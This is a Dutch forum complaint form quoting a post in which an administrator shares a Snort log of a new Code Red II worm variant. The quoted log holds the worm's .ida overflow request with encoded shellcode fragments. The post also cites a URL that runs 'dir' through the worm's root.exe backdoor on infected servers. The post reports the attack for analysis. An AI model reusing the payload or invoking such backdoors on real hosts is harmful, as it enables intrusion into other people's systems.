Je hebt een klacht over de onderstaande posting:
Er is sinds dinsdag een nieuwe variant opgedoken in m'n logs. Deze vultuit met XX ipv NN uit het snort-log: [font=courier][size=2] .GET/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 ....`........dg.6..dg.&.......h.........P.U..... .P.U..@.....X....U.=.......=.............T....u..~ 0...........F0........CodeRedII...$.U.f.....8..... P.. [snip] ...CMD.EXE.^.....cj......d:inetpubscriptsroot. exe...$.......P.U.j..+...d:progra~1common~1sys temMSADCroot.exe.. [snip] [/size][/font] En inderdaad op de meeste dozen laat http://x.x.x.x/scripts/root.exe?/d+dir+d: een mooie listing zien....
Beschrijf je klacht (Optioneel):